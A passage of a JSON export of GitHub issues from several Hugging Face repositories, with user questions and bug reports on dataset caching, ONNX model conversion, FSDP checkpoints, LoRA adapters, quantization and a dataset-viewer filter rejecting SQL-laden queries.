[here](https://github.com/manestay/borderlines/blob/4e161f444661e2ebfe643f3fe149d9258d63a57d/run_gpt/lib.py#L80) (lines 80-100)\r\n2. Run it in Python `load_borderlines_hf(None)`\r\n3. It completes successfully, downloading from HF hub, then doing the mapping logic etc.\r\n4. If you run it again after some time, it will re-download, ignoring the cache\r\n\r\n### Expected behavior\r\n\r\nRe-running the code, which calls `datasets.load_dataset('manestay/borderlines', 'territories')`, should use the cached version\r\n\r\n### Environment info\r\n\r\n\r\n- `datasets` version: 2.16.1\r\n- Platform: Linux-5.14.21-150500.55.7-default-x86_64-with-glibc2.31\r\n- Python version: 3.10.13\r\n- `huggingface_hub` version: 0.20.3\r\n- PyArrow version: 15.0.0\r\n- Pandas version: 1.5.3\r\n- `fsspec` version: 2023.10.0", "url": "https://github.com/huggingface/datasets/issues/6773", "state": "closed", "labels": [], "created_at": "2024-04-02T17:23:22Z", "updated_at": "2024-04-08T18:43:45Z", "comments": 5, "user": "manestay" }, { "repo": "huggingface/transformers.js", "number": 677, "title": "How you debug/measure Python -> Javascript ONNX Conversion ", "body": "### Question\r\n\r\nI have converted a couple ONNX models to use ONNXRuntimeWeb from using the Python onnx version as the source. Ive spent weeks debugging though. What's your strategy for comparing tensor values, etc, with these onnx models?\r\n\r\nIve console log'd N# of values from the tensor/array to see if the values have diverged far but it can get fatiguing. I can't simply just dump a numpy array and compare", "url": "https://github.com/huggingface/transformers.js/issues/677", "state": "open", "labels": [ "question" ], "created_at": "2024-04-02T16:16:22Z", "updated_at": "2024-04-02T16:18:03Z", "user": "matbeedotcom" }, { "repo": "huggingface/transformers.js", "number": 676, "title": "How to use fp16 version of the model file?", "body": "### Question\n\nexample files: https://huggingface.co/Xenova/modnet/tree/main/onnx", "url": "https://github.com/huggingface/transformers.js/issues/676", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-02T12:10:24Z", "updated_at": "2024-04-03T02:56:52Z", "user": "cyio" }, { "repo": "huggingface/chat-ui", "number": 969, "title": "Display does not automatically update after receiving message", "body": "After receiving the message, the chat page does not update and is always in the loading state. The received message can only be displayed after refreshing the page or switching sessions.\r\n![\u56fe\u7247](https://github.com/huggingface/chat-ui/assets/34700131/19150fbd-346c-4cf4-840d-a1bda9649d09)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/969", "state": "open", "labels": [ "question" ], "created_at": "2024-04-02T06:14:59Z", "updated_at": "2024-04-03T04:26:23Z", "user": "w4rw4r" }, { "repo": "huggingface/dataset-viewer", "number": 2654, "title": "Tutorial about how to start/run my own local dataset server.", "body": "Hey, \r\n I'm new to the dataset server and rookie in the Web field. I wanted to build my own dataset server however, is there any tutorial that can guide me to build my own dataset server?\r\n\r\nMany Thanks", "url": "https://github.com/huggingface/dataset-viewer/issues/2654", "state": "closed", "labels": [], "created_at": "2024-04-02T01:30:12Z", "updated_at": "2024-05-11T15:03:50Z", "user": "ANYMS-A" }, { "repo": "huggingface/accelerate", "number": 2603, "title": "How to load a FSDP checkpoint model", "body": "I have fine tuned gemma 2b model using FSDP and these are the below files available under the checkpoint \r\n\r\n```\r\noptimizer_0 pytorch_model_fsdp_0 rng_state_0.pth rng_state_1.pth scheduler.pt trainer_state.json\r\n```\r\nHow can i load the above FSDP object? \r\n\r\nkindly help me with this issue,\r\n", "url": "https://github.com/huggingface/accelerate/issues/2603", "state": "closed", "labels": [], "created_at": "2024-04-01T16:53:24Z", "updated_at": "2024-05-11T15:06:21Z", "user": "nlpkiddo-2001" }, { "repo": "huggingface/datasets", "number": 6769, "title": "(Willing to PR) Datasets with custom python objects", "body": "### Feature request\r\n\r\nHi thanks for the library! I would like to have a huggingface Dataset, and one of its column is custom (non-serializable) Python objects. For example, a minimal code:\r\n\r\n```\r\nclass MyClass:\r\n pass\r\n\r\ndataset = datasets.Dataset.from_list([\r\n dict(a=MyClass(), b='hello'),\r\n])\r\n```\r\n\r\nIt gives error:\r\n\r\n```\r\nArrowInvalid: Could not convert <__main__.MyClass object at 0x7a852830d050> with type MyClass: did not recognize Python value type when inferring an Arrow data type\r\n```\r\n\r\nI guess it is because Dataset forces to convert everything into arrow format. However, is there any ways to make the scenario work? Thanks!\r\n\r\n### Motivation\r\n\r\n(see above)\r\n\r\n### Your contribution\r\n\r\nYes, I am happy to PR!\r\n\r\nCross-posted: https://discuss.huggingface.co/t/datasets-with-custom-python-objects/79050?u=fzyzcjy\r\n\r\nEDIT: possibly related https://github.com/huggingface/datasets/issues/5766", "url": "https://github.com/huggingface/datasets/issues/6769", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-04-01T13:18:47Z", "updated_at": "2024-04-01T13:36:58Z", "comments": 0, "user": "fzyzcjy" }, { "repo": "huggingface/optimum-quanto", "number": 146, "title": "Question about the gradient of QTensor and QBitTensor", "body": "I am confused by the gradient of the Quantizer and QBitTensor. Take QTensor as the example:\r\n\r\nThe evaluation of forward is:\r\n```txt\r\ndata = base / scale (1)\r\ndata = round(data) (2)\r\ndata = clamp(data, qmin, qmax) (3)\r\n```\r\nI think the graidents should be:\r\n```txt\r\ngrad_div = 1 / scale (1)\r\ngrad_round = 1 (2) # refer to \"straight though estimator\": https://arxiv.org/abs/1308.3432\r\ngrad_clamp = 1 if qmin < data < qmax else 0 (3)\r\n```\r\nAccording to chain rule, the gradient of Quantizer should be `grad_div * grad_round * grad_clamp` which is equal to `1 / scale if qmin < base/scale < qmax else 0`\r\n\r\nI have reached QTensor's unit test and I find that dequantize is applied to QTensor before backward. I am confused by `Quantizer. backward` and the `dequantize` behavior before backward.", "url": "https://github.com/huggingface/optimum-quanto/issues/146", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-31T14:33:10Z", "updated_at": "2024-04-24T13:51:20Z", "user": "shuokay" }, { "repo": "huggingface/transformers.js", "number": 673, "title": "Is dit-base supported", "body": "### Question\r\n\r\nThere is a [Huggingface repo](https://huggingface.co/Xenova/dit-base) for the ONNX version of the dit-base model but I can't seem to make it work.\r\nI keep getting the following error:\r\n![image](https://github.com/xenova/transformers.js/assets/74398804/4b0ab09e-640e-47ee-ae05-27f759830424)\r\n\r\nIs the model currently supported? ", "url": "https://github.com/huggingface/transformers.js/issues/673", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-31T01:18:42Z", "updated_at": "2024-03-31T01:48:24Z", "user": "Maxzurek" }, { "repo": "huggingface/datatrove", "number": 143, "title": "Understand the output of deduplication", "body": "Hi \r\nI have arabic split from the CC trying to deduplicate it\r\nI used datatrove for this with a small example\r\nI got in my output folder two files\r\n0000.c4_dup and 0000.c4_sig\r\nCould you help me to understand this output\r\nI cannot read its content as it's c/00000.c4_sig is not UTF-8 encoded and seems to be binary files\r\nwhere should I see the nex text deduplicated\r\nThanks in advance", "url": "https://github.com/huggingface/datatrove/issues/143", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-30T23:16:21Z", "updated_at": "2024-05-06T09:30:43Z", "user": "Manel-Hik" }, { "repo": "huggingface/candle", "number": 1971, "title": "How to use `topk`?", "body": "I am trying to use `topk` to implement X-LoRA in Candle, and want to perform `topk` in the last dimension. Specifically, I need the `indices` return value (as returned by [`torch.topk`](https://pytorch.org/docs/stable/generated/torch.topk.html)). \r\n\r\nThese indices will either be used to creaste a mask to zero out all the values which are _not_ in the topk, and/or used to apply scalings on the nonzero values. This is a may be hard to understand, as such please see [this](https://github.com/EricLBuehler/xlora/blob/3637d1e00854649e8b9162f8f87233248577162c/src/xlora/xlora_insertion.py#L50-L63) snippet from our X-LoRA library.\r\n\r\nIs there a way to implement this with the current Candle functions, or is this planned to be implemented as a function?\r\n\r\n---\r\n\r\nAfter looking at the Mixtral MoE selection implementation, I cannot really understand it:\r\n\r\n> https://github.com/huggingface/candle/blob/3144150b8d1b80b2c6b469dcab5b717598f0a458/candle-transformers/src/models/mixtral.rs#L302-L323\r\n\r\nHow does this work? Thanks!", "url": "https://github.com/huggingface/candle/issues/1971", "state": "closed", "labels": [], "created_at": "2024-03-30T20:29:45Z", "updated_at": "2024-07-23T02:02:58Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers.js", "number": 671, "title": "What is involved in upgrading to V3?", "body": "### Question\n\nIn anticipation of being able to [generate music](https://github.com/xenova/transformers.js/issues/668) with musicGen I'm attempting to switch my project over to version 3, which I was able to build on my mac.\r\n\r\nI noticed that when using SpeechT5, the voice sounds completely garbled. I've attached a zip with two example WAV files.\r\n\r\n[audio_wav_examples.zip](https://github.com/xenova/transformers.js/files/14806203/audio_wav_examples.zip)\r\n\r\nI suspect I'm overlooking something, and need to upgrade some other things too? So my question is: could you give a broad overview of all the parts I need to upgrade?\r\n\r\nThings I've checked or tried:\r\n- Whisper Speech to Text is still working after 'dropping in' the new version.\r\n- Cleared caches (the JS caches)\r\n- Grabbing 'official' package from the [link to the JSDelivr repository](https://cdn.jsdelivr.net/npm/@xenova/transformers@3.0.0-alpha.0) in the V3 readme, but that doesn't work, which I assume is just an auto-build glitch.\r\n- Switching WAV generation code to the one in Transformers.js V3 example.\r\n- Switching to the [example webworker](https://github.com/xenova/transformers.js/blob/v3/examples/text-to-speech-client/src/worker.js) in the V3 branch, which looks very different, but it had no effect. (The old code was basically `synthesizer = await pipeline('text-to-speech', 'Xenova/speecht5_tts', { quantized: false });`).\r\n- The wav blob from the worker has the same issue as the raw Float32 array, so the issue is not in the way I was playing those arrays.\r\n\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/671", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-29T18:09:23Z", "updated_at": "2024-03-31T13:50:27Z", "user": "flatsiedatsie" }, { "repo": "huggingface/datasets", "number": 6764, "title": "load_dataset can't work with symbolic links", "body": "### Feature request\r\n\r\nEnable the `load_dataset` function to load local datasets with symbolic links. \r\n\r\nE.g, this dataset can be loaded:\r\n\u251c\u2500\u2500 example_dataset/\r\n\u2502 \u251c\u2500\u2500 data/\r\n\u2502 \u2502 \u251c\u2500\u2500 train/\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 file0\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 file1\r\n\u2502 \u2502 \u251c\u2500\u2500 dev/\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 file2\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 file3\r\n\u2502 \u251c\u2500\u2500 metadata.csv\r\n\r\nwhile this dataset can't:\r\n\u251c\u2500\u2500 example_dataset_symlink/\r\n\u2502 \u251c\u2500\u2500 data/\r\n\u2502 \u2502 \u251c\u2500\u2500 train/\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 sym0 -> file0\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 sym1 -> file1\r\n\u2502 \u2502 \u251c\u2500\u2500 dev/\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 sym2 -> file2\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 sym3 -> file3\r\n\u2502 \u251c\u2500\u2500 metadata.csv\r\n\r\nI have created an example dataset in order to reproduce the problem:\r\n\r\n1. Unzip `example_dataset.zip`.\r\n2. Run `no_symlink.sh`. Training should start without issues. \r\n3. Run `symlink.sh`. You will see that all four examples will be in train split, instead of having two examples in train and two examples in dev. The script won't load the correct audio files.\r\n\r\n[example_dataset.zip](https://github.com/huggingface/datasets/files/14807053/example_dataset.zip)\r\n\r\n### Motivation\r\n\r\nI have a very large dataset locally. Instead of initiating training on the entire dataset, I need to start training on smaller subsets of the data. Due to the purpose of the experiments I am running, I will need to create many smaller datasets with overlapping data. Instead of copying the all the files for each subset, I would prefer copying symbolic links of the data. This way, the memory usage would not significantly increase beyond the initial dataset size.\r\n\r\nAdvantages of this approach:\r\n\r\n- It would leave a smaller memory footprint on the hard drive\r\n- Creating smaller datasets would be much faster\r\n\r\n### Your contribution\r\n\r\nI would gladly contribute, if this is something useful to the community. It seems like a simple change of code, something like `file_path = os.path.realpath(file_path)` should be added before loading the files. If anyone has insights on how to incorporate this functionality, I would greatly appreciate your knowledge and input.", "url": "https://github.com/huggingface/datasets/issues/6764", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-03-29T17:49:28Z", "updated_at": "2025-04-29T15:06:28Z", "comments": 1, "user": "VladimirVincan" }, { "repo": "huggingface/transformers.js", "number": 670, "title": "Are tokenizers supposed to work in the browser?", "body": "### Question\n\nI'd love to use some pretrained tokenizers, right in my browser. On a number of occasions, I've tried to use this library to load and use a tokenizer in my browser, but it always fails with an error like this:\r\n```\r\nUncaught (in promise) SyntaxError: JSON.parse: unexpected character at line 1 column 1 of the JSON data\r\n getModelJSON hub.js:584\r\n loadTokenizer tokenizers.js:62\r\n from_pretrained tokenizers.js:4398\r\n gv9xs tok.js:3\r\n gv9xs tok.js:9\r\n newRequire dev.42f35062.js:71\r\n dev.42f35062.js:122\r\n dev.42f35062.js:145\r\nhub.js:584:16\r\n gv9xs tok.js:3\r\n AsyncFunctionThrow self-hosted:856\r\n (Async: async)\r\n gv9xs tok.js:9\r\n newRequire dev.42f35062.js:71\r\n dev.42f35062.js:122\r\n dev.42f35062.js:145\r\n```\r\nIs there anything I can do to make this work? My code is rather simple:\r\n```\r\nimport { AutoTokenizer } from '@xenova/transformers'\r\n;(async function () {\r\n const tokenizer = await AutoTokenizer.from_pretrained(\r\n 'Xenova/bert-base-uncased'\r\n )\r\n console.log(tokenizer)\r\n const { input_ids } = await tokenizer('I love transformers!')\r\n console.log(input_ids)\r\n})()\r\n```\r\nI serve this code via a Parcel development server, but it's never worked for me. Any advice would be greatly appreciated!", "url": "https://github.com/huggingface/transformers.js/issues/670", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-29T16:10:46Z", "updated_at": "2024-03-29T16:53:21Z", "user": "Vectorrent" }, { "repo": "huggingface/transformers.js", "number": 669, "title": "TinyLlama Conversion", "body": "### Question\r\n\r\nI ran the converter script on the tinyllama repo for both the TinyLlama models ([intermediate step 1431K 3T](https://huggingface.co/TinyLlama/TinyLlama-1.1B-intermediate-step-1431k-3T) and [chat v1.0](https://huggingface.co/TinyLlama/TinyLlama-1.1B-Chat-v1.0)) and uploaded them to my repo ([intermediate step 1431K 3T](https://huggingface.co/dmmagdal/tinyllama-1.1B-intermediate-step-1431k-3T-onnx-js) [chat v1.0](https://huggingface.co/dmmagdal/tinyllama-1.1B-chat-v1.0-onnx-js); I also have uploads where the quantized flag was enabled).\r\n\r\nWhen I try to run either of my converted models with the `AutoModelForCausalLM` or `pipeline`, I get the following error:\r\n```\r\nError: Could not locate file: \"https://huggingface.co/dmmagdal/tinyllama-1.1B-chat-v1.0-onnx-js/resolve/main/onnx/decoder_model_merged.onnx\".\r\n```\r\n\r\nThis error seems to be correct in that I do not have that file in my repo. Was there something I did wrong in the conversion process or is the model not fully supported by transformers.js?\r\n\r\nI'm not sure how or if it relates to the TinyLlama repo you have here: https://huggingface.co/Xenova/TinyLLama-v0/tree/main", "url": "https://github.com/huggingface/transformers.js/issues/669", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-29T14:50:06Z", "updated_at": "2025-10-13T04:57:32Z", "user": "dmmagdal" }, { "repo": "huggingface/datatrove", "number": 142, "title": "Deduplicating local data throws an error", "body": "Hi,\r\n\r\nI have data in my local machine in the format of a jsonl file and I want to deduplicate it. I'm using the following example:\r\n`sent_dedup_config = SentDedupConfig(\r\n n_sentences=3,\r\n split_sentences=False, # set to False to split on \\n instead\r\n only_dedup_in_index=True,\r\n min_doc_words=50,\r\n)\r\n\r\nFINDER_WORKERS = 10 # this will speed up/parallelize step 2\r\n\r\ndef run_example():\r\n pipeline_1 = [\r\n JsonlReader(\"CC_data_inputs/\"),\r\n SentenceDedupSignature(output_folder=\"cc_output/sigs\", config=sent_dedup_config, finder_workers=FINDER_WORKERS),\r\n ]\r\n\r\n pipeline_2 = [SentenceFindDedups(data_folder=\"cc_output/sigs\", output_folder=\"cc_output/dups\", config=sent_dedup_config)]\r\n\r\n pipeline_3 = [\r\n JsonlReader(data_folder=\"CC_data_inputs/\"),\r\n SentenceDedupFilter(data_folder=\"cc_output/dups\", config=sent_dedup_config),\r\n ]\r\n\r\n executor_1: PipelineExecutor = LocalPipelineExecutor(pipeline=pipeline_1, workers=4, tasks=4)\r\n executor_2: PipelineExecutor = LocalPipelineExecutor(pipeline=pipeline_2, workers=1, tasks=FINDER_WORKERS)\r\n executor_3: PipelineExecutor = LocalPipelineExecutor(pipeline=pipeline_3, workers=4, tasks=4)\r\n\r\n print(executor_1.run())\r\n print(executor_2.run())\r\n print(executor_3.run())\r\n`\r\nI edited the first pipeline to just read the jsonl file (assuming that my data is ready directly for step 2). When I run the code, it throws this error:\r\n\r\nTraceback (most recent call last):\r\n File \"/home/ubuntu/deduplication/sentence_deduplication.py\", line 4, in \r\n from datatrove.pipeline.dedup.sentence_dedup import SentDedupConfig\r\nImportError: cannot import name 'SentDedupConfig' from 'datatrove.pipeline.dedup.sentence_dedup' (/home/ubuntu/miniconda3/lib/python3.11/site-packages/datatrove/pipeline/dedup/sentence_dedup.py)\r\n\r\nMy data consists of a set of 5 jsonl files inside the folder CC_data_inputs. I just reinstalled the datatrove library. Could you help me figure it out?", "url": "https://github.com/huggingface/datatrove/issues/142", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-29T12:31:30Z", "updated_at": "2024-04-24T14:15:58Z", "user": "Manel-Hik" }, { "repo": "huggingface/optimum-intel", "number": 642, "title": "How to apply LoRA adapter to a model loaded with OVModelForCausalLM()?", "body": "In the transformers library, we can load multiple adapters to the original model by load_adapter then switch the specified adapter with set_adapter like below.\r\n\r\n```\r\n# base model\r\nmodel = AutoModelForCausalLM.from_pretrained(\r\n model_name,\r\n)\r\n\r\n# load multiple adapters\r\nmodel.load_adapter(\"model/adapter1/\", \"adapter1\")\r\nmodel.load_adapter(\"model/adapter2/\", \"adapter2\")\r\n\r\n# switch adapter\r\nmodel.set_adapter(\"adapter2\")\r\n```\r\nNow I want to apply LoRA adapters with OpenVINO, but I can't find an example of it.\r\nIs it possible to do it with OVModelForCausalLM?\r\n\r\n", "url": "https://github.com/huggingface/optimum-intel/issues/642", "state": "closed", "labels": [], "created_at": "2024-03-29T01:13:44Z", "updated_at": "2024-08-03T12:34:21Z", "user": "nai-kon" }, { "repo": "huggingface/transformers", "number": 29948, "title": "How to All Utilize all GPU's when device=\"balanced_low_0\" in GPU setting", "body": "### System Info\n\nI know that while loading the model in \"balanced_low_0\" GPU setting the model is loaded into all GPU's apart from 0: GPU. Where the 0: GPU is left to do the text inference. (i.e. text inference as in performing all the calculation to generate response inside the LLM)\r\n\r\nSo, as per the give device parameter my model is loaded onto 1,2,3 GPU's and 0: GPU is left for inference.\r\n\r\n| ID | GPU | MEM |\r\n| 0 | 0% | 3% |\r\n| 1 | 0% | 83% |\r\n| 2 | 0% | 82% |\r\n| 3 | 0% | 76% |\r\n\r\nQuestion: How can i also utilize the remaining 1,2,3 GPU's to perform text inference not only 0:GPU?\r\n\r\nContext: \"balanced_low_0\" evenly splits the model on all GPUs except the first one, and only puts on GPU 0 what does not fit on the others. This option is great when you need to use GPU 0 for some processing of the outputs, like when using the generate function for Transformers models\r\n\r\nReference: https://huggingface.co/docs/accelerate/en/concept_guides/big_model_inference#designing-a-device-map\r\n\r\nCC: \r\n@gante @ArthurZucker and @younesbelkada \r\n\r\nApologies if the ticket is raised under different bucket\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nna\n\n### Expected behavior\n\nna", "url": "https://github.com/huggingface/transformers/issues/29948", "state": "closed", "labels": [], "created_at": "2024-03-28T19:54:09Z", "updated_at": "2024-05-07T13:43:08Z", "user": "kmukeshreddy" }, { "repo": "huggingface/dataset-viewer", "number": 2649, "title": "Should we support /filter on columns that contain SQL commands?", "body": "See the `schema` column on https://huggingface.co/datasets/motherduckdb/duckdb-text2sql-25k. Clicking on any of the 'classes' leads to an error\r\n\r\n\"Capture\r\n\r\nThe erroneous URL is:\r\n\r\nhttps://datasets-server.huggingface.co/filter?dataset=motherduckdb%2Fduckdb-text2sql-25k&config=default&split=train&offset=0&length=100&where=schema%3D%27CREATE+TABLE+%22venue%22+%28%0A++%22venueId%22+INTEGER+NOT+NULL%2C%0A++%22venueName%22+VARCHAR%28100%29%2C%0A++%22venueInfo%22+JSON%2C%0A++PRIMARY+KEY+%28%22venueId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22author%22+%28%0A++%22authorId%22+INTEGER+NOT+NULL%2C%0A++%22authorName%22+VARCHAR%2850%29%2C%0A++%22authorPublications%22+INT%5B%5D%2C%0A++PRIMARY+KEY+%28%22authorId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22dataset%22+%28%0A++%22datasetId%22+INTEGER+NOT+NULL%2C%0A++%22datasetName%22+VARCHAR%2850%29%2C%0A++%22datasetInfo%22+STRUCT%28v+VARCHAR%2C+i+INTEGER%29%2C%0A++PRIMARY+KEY+%28%22datasetId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22journal%22+%28%0A++%22journalId%22+INTEGER+NOT+NULL%2C%0A++%22journalName%22+VARCHAR%28100%29%2C%0A++%22journalInfo%22+MAP%28INT%2C+DOUBLE%29%2C%0A++PRIMARY+KEY+%28%22journalId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22keyphrase%22+%28%0A++%22keyphraseId%22+INTEGER+NOT+NULL%2C%0A++%22keyphraseName%22+VARCHAR%2850%29%2C%0A++%22keyphraseInfo%22+VARCHAR%2850%29%5B%5D%2C%0A++PRIMARY+KEY+%28%22keyphraseId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22paper%22+%28%0A++%22paperId%22+INTEGER+NOT+NULL%2C%0A++%22title%22+VARCHAR%28300%29%2C%0A++%22venueId%22+INTEGER%2C%0A++%22year%22+INTEGER%2C%0A++%22numCiting%22+INTEGER%2C%0A++%22numCitedBy%22+INTEGER%2C%0A++%22journalId%22+INTEGER%2C%0A++%22paperInfo%22+UNION%28num+INT%2C+str+VARCHAR%29%2C%0A++PRIMARY+KEY+%28%22paperId%22%29%2C%0A++FOREIGN+KEY%28%22journalId%22%29+REFERENCES+%22journal%22%28%22journalId%22%29%2C%0A++FOREIGN+KEY%28%22venueId%22%29+REFERENCES+%22venue%22%28%22venueId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22cite%22+%28%0A++%22citingPaperId%22+INTEGER+NOT+NULL%2C%0A++%22citedPaperId%22+INTEGER+NOT+NULL%2C%0A++%22citeInfo%22+INT%5B%5D%2C%0A++PRIMARY+KEY+%28%22citingPaperId%22%2C%22citedPaperId%22%29%2C%0A++FOREIGN+KEY%28%22citedpaperId%22%29+REFERENCES+%22paper%22%28%22paperId%22%29%2C%0A++FOREIGN+KEY%28%22citingpaperId%22%29+REFERENCES+%22paper%22%28%22paperId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22paperDataset%22+%28%0A++%22paperId%22+INTEGER%2C%0A++%22datasetId%22+INTEGER%2C%0A++%22paperDatasetInfo%22+JSON%2C%0A++PRIMARY+KEY+%28%22datasetId%22%2C+%22paperId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22paperKeyphrase%22+%28%0A++%22paperId%22+INTEGER%2C%0A++%22keyphraseId%22+INTEGER%2C%0A++%22paperKeyphraseInfo%22+JSON%2C%0A++PRIMARY+KEY+%28%22keyphraseId%22%2C%22paperId%22%29%2C%0A++FOREIGN+KEY%28%22paperId%22%29+REFERENCES+%22paper%22%28%22paperId%22%29%2C%0A++FOREIGN+KEY%28%22keyphraseId%22%29+REFERENCES+%22keyphrase%22%28%22keyphraseId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22writes%22+%28%0A++%22paperId%22+INTEGER%2C%0A++%22authorId%22+INTEGER%2C%0A++%22writesInfo%22+JSON%2C%0A++PRIMARY+KEY+%28%22paperId%22%2C%22authorId%22%29%2C%0A++FOREIGN+KEY%28%22paperId%22%29+REFERENCES+%22paper%22%28%22paperId%22%29%2C%0A++FOREIGN+KEY%28%22authorId%22%29+REFERENCES+%22author%22%28%22authorId%22%29%0A%29%3B%27\r\n\r\n```json\r\n{\"error\":\"Parameter 'where' contains invalid symbols\"}\r\n```\r\n\r\nIt's because the content includes some of the forbidden symbols:\r\n\r\nhttps://github.com/huggingface/datasets-server/blob/4dddea2e6a476d52ba5be0c7c64fb8eca9827935/services/search/src/search/routes/filter.py#L53\r\n\r\nDo you think it's possible to support the above query? Or should we handle the error on the Hub (not easy to do more than currently)?", "url": "https://github.com/huggingface/dataset-viewer/issues/2649", "state": "open", "labels": [ "question", "api", "P2" ], "created_at": "2024-03-28T14:14:01Z", "updated_at": "2024-03-28T14:24:34Z", "user": "severo" }, { "repo": "huggingface/accelerate", "number": 2593, "title": "How to use training function rather than training scripts in multi GPUs and multi node?", "body": "I confirmed that the Multi-gpu launcher is executed based on the training function using the PrepareForLaunch function in \"accelerate/examples/multigpu_remote_launcher.py\".\r\n\r\nUsually, the \"accelerate launch\" or \"python -m torch.distributed.run\" command is used for multi-node, but is there a way to utilize a training function like the PrepareForLaunch function?", "url": "https://github.com/huggingface/accelerate/issues/2593", "state": "closed", "labels": [], "created_at": "2024-03-28T07:05:50Z", "updated_at": "2024-05-05T15:06:26Z", "user": "wlsghks4043" }, { "repo": "huggingface/alignment-handbook", "number": 144, "title": "Can we please add the option to work with a tokenized dataset, escpailly for the CPT task. ", "body": "Since we have the CPT task now, it would be nice to have the ability to feel a tokenized and packed dataset directly. ", "url": "https://github.com/huggingface/alignment-handbook/issues/144", "state": "open", "labels": [], "created_at": "2024-03-27T18:31:58Z", "updated_at": "2025-02-27T16:23:06Z", "comments": 1, "user": "shamanez" }, { "repo": "huggingface/transformers.js", "number": 668, "title": "Is it possible to run a music / sounds generation model?", "body": "### Question\n\nI'd love to create a browser-based music generation tool, or one that can turn text into sound effects. Is that supported?\r\n\r\nI guess my more general question is: can Transformers.js run pretty much any .onnx I throw at it, or does each model require some level of implementation before it can be used?", "url": "https://github.com/huggingface/transformers.js/issues/668", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-27T18:22:31Z", "updated_at": "2024-05-13T21:17:54Z", "user": "flatsiedatsie" }, { "repo": "huggingface/optimum-quanto", "number": 139, "title": "Dequantizing tensors using quanto", "body": "I noticed the quantized models have these 4 additional features, for every weight in the original, e.g:\r\n```\r\nmodel.layers.0.mlp.down_proj.activation_qtype,\r\nmodel.layers.0.mlp.down_proj.input_scale,\r\nmodel.layers.0.mlp.down_proj.output_scale,\r\nmodel.layers.0.mlp.down_proj.weight_qtype\r\n```\r\nI guess `qtype` refers to the quantized datatype, and `scale` probably refers to the scaling factor used during quantization? Although what is the difference between `input_scale` and `output scale`? Is it possible to recreate the exact original tensor using these values and the quantized weight?\r\nIf yes, then what would the formula be for the dequantization?", "url": "https://github.com/huggingface/optimum-quanto/issues/139", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-27T18:00:34Z", "updated_at": "2024-04-11T09:22:29Z", "user": "raunaks13" }, { "repo": "huggingface/safetensors", "number": 458, "title": "Safetensors uses excessive RAM when saving files", "body": "Safetensors uses around twice the RAM that `torch.save`:\r\n\r\n```python\r\nimport resource\r\nimport torch\r\nfrom safetensors.torch import save_file\r\n\r\ntorch.save({'tensor': torch.randn((500000000))}, 'test.torch')\r\nprint(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\r\nsave_file({'tensor': torch.randn((500000000))}, 'test.safetensors')\r\nprint(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\r\n```\r\n\r\nOutput:\r\n```\r\n2308324\r\n4261528\r\n```\r\n\r\nI believe this is because safetensors loads the full tensor in the `prepare` function instead of streaming it. Is it possible to stream the writes instead? For instance, having a `prepare_metadata` function that generates the metadata first, writing that first, then each individual tensor.", "url": "https://github.com/huggingface/safetensors/issues/458", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-03-27T12:11:38Z", "updated_at": "2024-05-02T01:47:32Z", "comments": 1, "user": "sheepymeh" }, { "repo": "huggingface/transformers", "number": 29897, "title": "How to finetune a language model after extent token embeddings?", "body": "If I add some new tokens for a language model, I will get some random initialized weights in embeddings and lm_head. Is there any official way to train only these new weights? Or all I can do is adding hooks to the tensors to zero the gradient for weights I do not want to change?", "url": "https://github.com/huggingface/transformers/issues/29897", "state": "closed", "labels": [], "created_at": "2024-03-27T08:20:24Z", "updated_at": "2024-03-27T15:01:04Z", "user": "bluewanderer" }, { "repo": "huggingface/text-generation-inference", "number": 1677, "title": "how to get the latest version number?", "body": "In the document, I use \"docker run ghcr.io/huggingface/text-generation-inference:latest\" to run the latest version of tgi. But in a production environment, I need to fix the version number. I can't find any webpage similar to [docker hub](https://hub.docker.com/r/pytorch/manylinux-cuda102). So how can I use docker command line to get the version list of huggingface/text-generation-inference?", "url": "https://github.com/huggingface/text-generation-inference/issues/1677", "state": "closed", "labels": [], "created_at": "2024-03-27T05:43:49Z", "updated_at": "2024-03-29T02:30:10Z", "user": "fancyerii" }, { "repo": "huggingface/optimum-quanto", "number": 134, "title": "Should quanto use int dtype in AffineQuantizer instead of uint?", "body": "According to code in https://github.com/huggingface/quanto/blob/main/quanto/tensor/qbitstensor.py#L34 I find quanto use uint dtype to store the quantized value in affine quantizer, while in symmetric quantizer it is int dtype \r\n https://github.com/huggingface/quanto/blob/main/quanto/tensor/qtensor.py#L62.\r\n\r\nTaking hardware into consideration, If we quantize both weight and activation to int types, will it save the cost of GPU or NPU since this only requires integer-type MAC arrays", "url": "https://github.com/huggingface/optimum-quanto/issues/134", "state": "closed", "labels": [ 